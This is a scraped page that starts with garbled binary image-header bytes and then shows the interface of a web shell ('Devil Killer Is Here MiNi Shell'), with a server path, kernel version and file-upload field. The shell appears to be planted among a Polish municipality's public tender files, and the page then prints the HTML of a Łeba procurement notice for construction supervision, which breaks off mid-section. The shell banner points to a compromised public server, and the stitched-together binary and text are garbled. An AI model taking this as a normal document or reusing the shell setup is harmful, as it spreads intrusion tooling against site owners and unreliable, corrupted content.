JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220211/0005405401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie nadzoru inwestorskiego nad zadaniem pn. Przebudowa układu<br/>komunikacyjnego ulic Kościuszki, Morskiej i Wojska Polskiego oraz ulic przyległych wraz z modernizacją Skweru Rybaka. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Łeba</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979743</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 90</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łeba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 86 61 510</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@leba.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://leba.um.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie nadzoru inwestorskiego nad zadaniem pn. Przebudowa układu<br/>komunikacyjnego ulic Kościuszki, Morskiej i Wojska Polskiego oraz ulic przyległych wraz z modernizacją Skweru Rybaka. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8ea39734-88d5-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00054054</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002619/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 Przebudowa układu komunikacyjnego ulic Kościuszki, Morskiej i Wojska Polskiego oraz ulic przyległych wraz z modernizacją Skweru Rybaka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/leba <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu platformy zakupowej dostępnej pod adresem:<br/>https://platformazakupowa.pl/pn/leba<br/>2. Zaleca się, aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego, posiadał konto na platformie zakupowej. Rejestracja oraz logowanie dostępne jest pod<br/>adresem: https://platformazakupowa.pl/pn/leba Korzystanie z Platformy przez Wykonawcę jest<br/>bezpłatne.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z platformy zakupowej<br/>dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z platformy zakupowej, określone w Regulaminie dostępnym pod<br/>adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i<br/>wycofania oferty oraz do komunikacji wynosi 150MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę<br/>zakupową.<br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy<br/>i załączniki do oferty) odbywa się elektronicznie za pośrednictwem platformy zakupowej i formularza<br/>Wyślij wiadomość. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP)<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: iwona.mielewczyk@leba.eu.<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę jako załączniki. Zamawiający dopuszcza również możliwość składania<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za<br/>pomocą poczty elektronicznej, na adres email: iwona.mielewczyk@leba.eu. Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest Urząd Miejski w Łebie, ul.Kościuszki 90, 84-360<br/>Łeba, tel. 598661510;<br/>2. inspektorem ochrony danych osobowych w Urzędzie Miejskim w Łebie jest Pan Radosław Czyżewski,<br/>kontakt: adres e-mail: radoslaw.czyzewski@leba.eu, telefon 59 8661 510 wew. 44;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843 z późn. zm.), dalej „ustawa Pzp”;<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.4.2022.IM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 84500 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie nadzoru inwestorskiego nad zadaniem pn. Przebudowa układu<br/>komunikacyjnego ulic Kościuszki, Morskiej i Wojska Polskiego oraz ulic przyległych wraz z modernizacją Skweru Rybaka w branży drogowej<br/>2. Prace wykonywane będą na podstawie dokumentacji projektowej pn. Przebudowa Skweru<br/>Rybaka wraz z budową, przebudową, remontem budowli i obiektów małej architektury, m. in.:<br/>pomnika, fontanny wraz z podziemnymi komorami technologicznymi, ławek, leżaków, śmietników,<br/>donic, latarni, podziemnej kapsuły czasu, stojaków rowerowych, punktu naprawy rowerów,<br/>urządzeń placu zabaw, poidełka; budowa parkingu dla kolejek turystycznych i elektrycznych<br/>wózków pasażerskich; budowa budynku toalety publicznej; remont istniejącego pomnika;<br/>przebudowa układu komunikacyjnego ulic: Nad Ujściem, Krótka, Tysiąclecia, Wojska Polskiego,<br/>Morska, Kościuszki wraz z budową obiektów małej architektury, m. in.: ławek i śmietników;<br/>przebudową i budową infrastruktury technicznej, m. in. sieci, przyłączy i instalacji: kanalizacji<br/>deszczowej, kanalizacji sanitarnej, wodociągowej, elektroenergetycznej, teletechnicznej,<br/>oświetlenia terenu i obiektów, technologii fontanny; budową kanału technologicznego; rozbiórka<br/>istniejących elementów zagospodarowania terenu, wykonanej przez Pniewski Architekci Sp. z o.o.<br/>81-389 Gdynia ul. Świętojańska 79/9 stanowiącej załącznik nr 7 do niniejszej SWZ.<br/>3. Szczegółowy zakres w/w prac do wykonania, określony został w dokumentacji projektowej<br/>budowlanej, specyfikacjach technicznych wykonania i odbioru robót, które stanowią załącznik nr 7<br/>SWZ. Dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót oraz opis<br/>przedmiotu zamówienia znajdujący się w SWZ obejmują całość zadania inwestycyjnego.<br/>Załączone do SWZ przedmiary robót nie są obowiązujące i stanowią jedynie materiał<br/>pomocniczy dla Wykonawcy robót budowlanych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 55000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt. 7<br/>ustawy Prawo zamówień publicznych, polegających na powtórzeniu podobnych usług,<br/>zgodnych z przedmiotem zamówienia podstawowego. Przedmiot zamówienia: podobne usługi zgodne z przedmiotem zamówienia podstawowego o kodach CPV określonych w tym<br/>zamówieniu. Wielkość lub zakres zamówienia: do 20% wartości zamówienia podstawowego. Warunki<br/>na jakich zostanie udzielone zamówienie: zgodnie z warunkami dotyczącymi zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się następującymi<br/>kryteriami, z przypisaniem im odpowiednio wag:<br/>1) cena oferty – 60%<br/>2) doświadczenie – 40%<br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1)Punkty w kryterium cena brutto oferty w PLN wyliczone będą z dokładnością do<br/>dwóch miejsc po przecinku (zasada zaokrąglania trzeciego miejsca po przecinku –<br/>poniżej 5 końcówkę pomija się, powyżej i równe 5 zaokrągla się w górę) wg<br/>poniższego wzoru:<br/>Cmin<br/>C= ------------------ x 60 pkt.<br/>Cx<br/>gdzie:<br/>C – przyznane punkty w kryterium ceny oferty brutto w PLN;<br/>Cmin - najniższa cena oferty brutto w PLN spośród ofert niepodlegających odrzuceniu;<br/>Cx – cena brutto w PLN badanej oferty.<br/>2)Punkty w kryterium doświadczenie, zostaną przyznane wg następujących zasad:<br/>Doświadczenie – maksymalnie 40 pkt<br/>Wykonawca wskaże osobę, która będzie pełnić funkcję inspektora nadzoru w branży drogowej<br/>posiadającą doświadczenie w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego,<br/>kierownika budowy lub kierownika robót w branży drogowej nad:<br/>- dwoma lub mniej zadaniami w zakresie budowy lub przebudowy drogi – 10 pkt;<br/>- trzema zadaniami w zakresie budowy lub przebudowy drogi – 20 pkt;<br/>- czterema zadaniami w zakresie budowy lub przebudowy drogi – 30 pkt;<br/>- pięcioma lub więcej zadaniami w zakresie budowy lub przebudowy drogi – 40 pkt;<br/>3. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie<br/>ze wszystkich kryteriów. Ocenę łączną oferty stanowi suma punktów uzyskanych w ramach<br/>poszczególnych kryteriów. Zamawiający wyliczy ocenę łączą ocenianych ofert na podstawie<br/>poniższego wzoru:<br/>E = C + X<br/>gdzie:<br/>E – łączna liczba punktów otrzymana przez ofertę we wszystkich kryteriach oceny,<br/>C – liczba punktów w kryterium ceny oferty brutto w PLN,<br/>X – liczba punktów w kryterium doświadczenie.<br/>4. Zamawiający będzie zaokrąglał punkty do dwóch miejsc po przecinku w każdym wskaźniku.<br/>Zasada zaokrąglenia dotyczy trzeciego miejsca po przecinku – poniżej 5 końcówkę pominie,<br/>powyżej i równe 5 zaokrągli w górę.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający<br/>wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym ofert<br/>dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Pełnienie nadzoru inwestorskiego nad zadaniem pn. Przebudowa układu<br/>komunikacyjnego ulic Kościuszki, Morskiej i Wojska Polskiego oraz ulic przyległych<br/>wraz z modernizacją Skweru Rybaka w branży sanitarnej.<br/>2. Prace wykonywane będą na podstawie dokumentacji projektowej pn. Przebudowa Skweru<br/>Rybaka wraz z budową, przebudową, remontem budowli i obiektów małej architektury, m. in.:<br/>pomnika, fontanny wraz z podziemnymi komorami technologicznymi, ławek, leżaków, śmietników,<br/>donic, latarni, podziemnej kapsuły czasu, stojaków rowerowych, punktu naprawy rowerów,<br/>urządzeń placu zabaw, poidełka; budowa parkingu dla kolejek turystycznych i elektrycznych<br/>wózków pasażerskich; budowa budynku toalety publicznej; remont istniejącego pomnika;<br/>przebudowa układu komunikacyjnego ulic: Nad Ujściem, Krótka, Tysiąclecia, Wojska Polskiego,<br/>Morska, Kościuszki wraz z budową obiektów małej architektury, m. in.: ławek i śmietników;<br/>przebudową i budową infrastruktury technicznej, m. in. sieci, przyłączy i instalacji: kanalizacji<br/>deszczowej, kanalizacji sanitarnej, wodociągowej, elektroenergetycznej, teletechnicznej,<br/>oświetlenia terenu i obiektów, technologii fontanny; budową kanału technologicznego; rozbiórka<br/>istniejących elementów zagospodarowania terenu, wykonanej przez Pniewski Architekci Sp. z o.o.<br/>81-389 Gdynia ul. Świętojańska 79/9 stanowiącej załącznik nr 7 do niniejszej SWZ.<br/>3. Szczegółowy zakres w/w prac do wykonania, określony został w dokumentacji projektowej<br/>budowlanej, specyfikacjach technicznych wykonania i odbioru robót, które stanowią załącznik nr 7<br/>SWZ. Dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót oraz opis<br/>przedmiotu zamówienia znajdujący się w SWZ obejmują całość zadania inwestycyjnego.<br/>Załączone do SWZ przedmiary robót nie są obowiązujące i stanowią jedynie materiał<br/>pomocniczy dla Wykonawcy robót budowlanych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 22000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt. 7<br/>ustawy Prawo zamówień publicznych, polegających na powtórzeniu podobnych usług,<br/>zgodnych z przedmiotem zamówienia podstawowego. Przedmiot zamówienia: podobne usługi zgodne z przedmiotem zamówienia podstawowego o kodach CPV określonych w tym<br/>zamówieniu. Wielkość lub zakres zamówienia: do 20% wartości zamówienia podstawowego. 